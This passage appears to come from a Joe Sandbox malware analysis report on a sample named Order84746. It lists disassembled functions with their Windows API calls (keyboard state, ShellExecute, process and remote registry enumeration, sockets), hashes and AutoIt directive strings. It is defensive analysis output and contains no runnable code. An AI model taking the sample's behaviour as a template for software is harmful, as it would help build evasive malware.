                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                          • String ID:
                          • API String ID: 1422805418-0
                          • Opcode ID: 93b1bd248dce6ba48d703b08e03f875b2baa7c50f4e7cb417caa866daa0e42da
                          • Instruction ID: c0678be739654992afa276c4a0d2fc3d3780424a6018bb9ea10bac69d80e28d9
                          • Opcode Fuzzy Hash: 93b1bd248dce6ba48d703b08e03f875b2baa7c50f4e7cb417caa866daa0e42da
                          • Instruction Fuzzy Hash: 4D413671F103029FEB149FA8CA4475DB7B5AF81334F208318E425AB2E1D7B49840CBD2
                          Function 00948ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00948EE4
                          • GetDC.USER32(00000000), ref: 00948EEC
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00948EF7
                          • ReleaseDC.USER32(00000000,00000000), ref: 00948F03
                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00948F3F
                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00948F50
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0094BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00948F8A
                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00948FAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                          • String ID:
                          • API String ID: 3864802216-0
                          • Opcode ID: 604042269443c97509239d7e29093c80cf13824ce7c12f9f21b25a1d8324b49b
                          • Instruction ID: ad0bfdae30a6f67ade573a7ddd6c937d7b60a9e844ee59947e54165d9bf04c07
                          • Opcode Fuzzy Hash: 604042269443c97509239d7e29093c80cf13824ce7c12f9f21b25a1d8324b49b
                          • Instruction Fuzzy Hash: BD319A72615214BFEB108F54CC8AFEB3BAEEF49711F044069FE099A191DAB59841DBB0
                          Function 0093961C Relevance: 10.7, APIs: 7, Instructions: 220networkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorLast$htonsinet_ntoaselect
                          • String ID:
                          • API String ID: 500251541-0
                          • Opcode ID: 29d4c278e95347d2990fa4d5901cd4f47f5d4295edae38e06ab9e8d2ced7f6f4
                          • Instruction ID: d4cea8768d7bd28e5038253fb9cfa374849d6113c3bb68e37b342aff1d5d71a2
                          • Opcode Fuzzy Hash: 29d4c278e95347d2990fa4d5901cd4f47f5d4295edae38e06ab9e8d2ced7f6f4
                          • Instruction Fuzzy Hash: A271AA71508240ABC710EF69DC85F6BB7A8FFC9724F104A1DF5569B2A1EBB0D904CB92
                          Function 008FAE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2e7c2e6e2ba7346d9d0e08199348b4221a27fe3396387431792952f847c470c2
                          • Instruction ID: 496d86cd79b4292670929c94e0d59a89e1e4d5c5847bae42f821b1fe9888491b
                          • Opcode Fuzzy Hash: 2e7c2e6e2ba7346d9d0e08199348b4221a27fe3396387431792952f847c470c2
                          • Instruction Fuzzy Hash: FC716FB190410DEFCB18CF68CC85ABE7B79FF85314F248149FA19AA255C7309A41CF61
                          Function 00942230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 0094225A
                          • _memset.LIBCMT ref: 00942323
                          • ShellExecuteExW.SHELL32(?), ref: 00942368
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                            • Part of subcall function 008FC6F4: _wcscpy.LIBCMT ref: 008FC717
                          • CloseHandle.KERNEL32(00000000), ref: 0094242F
                          • FreeLibrary.KERNEL32(00000000), ref: 0094243E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                          • String ID: @
                          • API String ID: 4082843840-2766056989
                          • Opcode ID: de7fd2aa5d5b34803db9db6affde09e22a9d206b2618afaf96877acfbe58e81e
                          • Instruction ID: 254a8fb5099a873263773f0f54e6d78d1b66c6bc2c7d0c2cffcf525e0884f5e8
                          • Opcode Fuzzy Hash: de7fd2aa5d5b34803db9db6affde09e22a9d206b2618afaf96877acfbe58e81e
                          • Instruction Fuzzy Hash: 64717D74A006199FCF14EFA9C981AAEBBF5FF48310F108459F855AB3A1DB34AD40CB91
                          Function 00923BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32(00000000), ref: 00923C02
                          • GetKeyboardState.USER32(?), ref: 00923C17
                          • SetKeyboardState.USER32(?), ref: 00923C78
                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00923CA4
                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00923CC1
                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00923D05
                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00923D26
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: ddbc1467fa6e3e951d5c855973e66bfd4dbf1b7280fc62565ef3cbbc92edfab9
                          • Instruction ID: aa19a6717fff7bad6a6dce26e73d8eb2f770a28f69c24ec2cd417ee87fcc473b
                          • Opcode Fuzzy Hash: ddbc1467fa6e3e951d5c855973e66bfd4dbf1b7280fc62565ef3cbbc92edfab9
                          • Instruction Fuzzy Hash: 6A51E6A0A087E53DFB328734DC45B76BF9D6B06300F08C489E5D5568C7D698EE94E750
                          Function 00948FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00948FE7
                          • GetWindowLongW.USER32(00FE9718,000000F0), ref: 0094901A
                          • GetWindowLongW.USER32(00FE9718,000000F0), ref: 0094904F
                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00949081
                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009490AB
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 009490BC
                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009490D6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LongWindow$MessageSend
                          • String ID:
                          • API String ID: 2178440468-0
                          • Opcode ID: ad6c34a904142c5f034741dcbf087bc9ed77a81c440346238226e8d16263a777
                          • Instruction ID: c21644bee6658b81118bf10db4a4328f9798b920d97d899eb1bd5f7bf909fde1
                          • Opcode Fuzzy Hash: ad6c34a904142c5f034741dcbf087bc9ed77a81c440346238226e8d16263a777
                          • Instruction Fuzzy Hash: E7310334758215AFDB20CF58DC85F6637A9FB4A754F1441A8F619CB2B1CBB2AC40EB81
                          Function 009208AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009208F2
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00920918
                          • SysAllocString.OLEAUT32(00000000), ref: 0092091B
                          • SysAllocString.OLEAUT32(?), ref: 00920939
                          • SysFreeString.OLEAUT32(?), ref: 00920942
                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 00920967
                          • SysAllocString.OLEAUT32(?), ref: 00920975
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: 7c245c6a61fcb1ab9c2ed7f95495fa8cf087402882f1a82a4645c8a967024a31
                          • Instruction ID: 6a12057a621bbece4faaca7636dd4a6df55d86feed4d98f92152c57d99a37b1a
                          • Opcode Fuzzy Hash: 7c245c6a61fcb1ab9c2ed7f95495fa8cf087402882f1a82a4645c8a967024a31
                          • Instruction Fuzzy Hash: 3921C776605218AFAB109FBCDC88DBB73ACFF49360B008525F915DB1A6D6B0EC45DB60
                          Function 00922472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                          • API String ID: 1038674560-2734436370
                          • Opcode ID: 881008478ed546bfcec75575c70f5fdfec8d26803bb6905f3216e4c4766cd21b
                          • Instruction ID: 2bc2c72af83208b7cfd148b6d2f41af5975a19027a9dd0541427aa9fbe30ca55
                          • Opcode Fuzzy Hash: 881008478ed546bfcec75575c70f5fdfec8d26803bb6905f3216e4c4766cd21b
                          • Instruction Fuzzy Hash: 90214C3210853577D320BB38AD12FB773ACEFA5314F54C42AF949D7086E7559A42C3A5
                          Function 00920986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009209CB
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009209F1
                          • SysAllocString.OLEAUT32(00000000), ref: 009209F4
                          • SysAllocString.OLEAUT32 ref: 00920A15
                          • SysFreeString.OLEAUT32 ref: 00920A1E
                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 00920A38
                          • SysAllocString.OLEAUT32(?), ref: 00920A46
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: 1c59df12aacf7cf96a9932e05df7db701a4013d673d865e5e9fd94c8e1f63df2
                          • Instruction ID: a74c030226cbde59ba6ce5e2b63b51e06a408861402185e745fd442916da4668
                          • Opcode Fuzzy Hash: 1c59df12aacf7cf96a9932e05df7db701a4013d673d865e5e9fd94c8e1f63df2
                          • Instruction Fuzzy Hash: 4421C435605214AFDB109FBCDC88CAB73ECEF493607408125F919CB2A6DAB0EC459B60
                          Function 0094A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008FD1BA
                            • Part of subcall function 008FD17C: GetStockObject.GDI32(00000011), ref: 008FD1CE
                            • Part of subcall function 008FD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 008FD1D8
                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0094A32D
                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0094A33A
                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0094A345
                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0094A354
                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0094A360
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$CreateObjectStockWindow
                          • String ID: Msctls_Progress32
                          • API String ID: 1025951953-3636473452
                          • Opcode ID: 66ff53317398f526711327f6139d66f5c6c3e7a6b1b679a93ff66dc865d47d03
                          • Instruction ID: 8ae05e7673c287f29405c6c3f5e07bc337eec512ed38d75d41584c155f134fbb
                          • Opcode Fuzzy Hash: 66ff53317398f526711327f6139d66f5c6c3e7a6b1b679a93ff66dc865d47d03
                          • Instruction Fuzzy Hash: 8C1190B115021DBEEF119F64CC85EEB7F6DFF09798F014114FA08A60A0D6729C21DBA4
                          Function 008FCCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                          Download Yara Rule
                          APIs
                          • GetClientRect.USER32(?,?), ref: 008FCCF6
                          • GetWindowRect.USER32(?,?), ref: 008FCD37
                          • ScreenToClient.USER32(?,?), ref: 008FCD5F
                          • GetClientRect.USER32(?,?), ref: 008FCE8C
                          • GetWindowRect.USER32(?,?), ref: 008FCEA5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Rect$Client$Window$Screen
                          • String ID:
                          • API String ID: 1296646539-0
                          • Opcode ID: d1a697030baee6a8c76167a8679c221b85147a166bc1a5cc61a8e5c7ab3f9590
                          • Instruction ID: 6aa7c7f3f68f2903bf42c554b11a70d5832489e39ab9d6e9de5bbcdcd24b9999
                          • Opcode Fuzzy Hash: d1a697030baee6a8c76167a8679c221b85147a166bc1a5cc61a8e5c7ab3f9590
                          • Instruction Fuzzy Hash: 34B14579A0024DDBDB14CFB9C5806EEBBB1FF08304F148129ED69EB250DB71AA54CB64
                          Function 00941BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00941C18
                          • Process32FirstW.KERNEL32(00000000,?), ref: 00941C26
                          • __wsplitpath.LIBCMT ref: 00941C54
                            • Part of subcall function 00901DFC: __wsplitpath_helper.LIBCMT ref: 00901E3C
                          • _wcscat.LIBCMT ref: 00941C69
                          • Process32NextW.KERNEL32(00000000,?), ref: 00941CDF
                          • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00941CF1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                          • String ID:
                          • API String ID: 1380811348-0
                          • Opcode ID: e4310e0b05a8c049f90b1a443042cf4568be00e7d99a94b51f367fd0fa14999a
                          • Instruction ID: 09048ba433761cd1ff604e4d7e23b5af86904c6d5c34df56eb5726483d433adb
                          • Opcode Fuzzy Hash: e4310e0b05a8c049f90b1a443042cf4568be00e7d99a94b51f367fd0fa14999a
                          • Instruction Fuzzy Hash: 24513B715083449FD720EF24C885EABB7E8FB89754F00491EF585D6291EB709A458B92
                          Function 00942FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00943C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00942BB5,?,?), ref: 00943C1D
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009430AF
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009430EF
                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00943112
                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0094313B
                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0094317E
                          • RegCloseKey.ADVAPI32(00000000), ref: 0094318B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                          • String ID:
                          • API String ID: 3451389628-0
                          • Opcode ID: 2868edc2e3e46de62c42aaf0a5fac54c68d836200a5c3bc9380178b1b3b2b538
                          • Instruction ID: 96a713be207486b54fbf707b2ae89aba723011e376de2785dbb159aa3f138d4e
                          • Opcode Fuzzy Hash: 2868edc2e3e46de62c42aaf0a5fac54c68d836200a5c3bc9380178b1b3b2b538
                          • Instruction Fuzzy Hash: 21515631608344AFC704EF68CC85E6ABBE9FF89310F04891DF595972A1DB71EA09DB52
                          Function 009484DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetMenu.USER32(?), ref: 00948540
                          • GetMenuItemCount.USER32(00000000), ref: 00948577
                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0094859F
                          • GetMenuItemID.USER32(?,?), ref: 0094860E
                          • GetSubMenu.USER32(?,?), ref: 0094861C
                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0094866D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
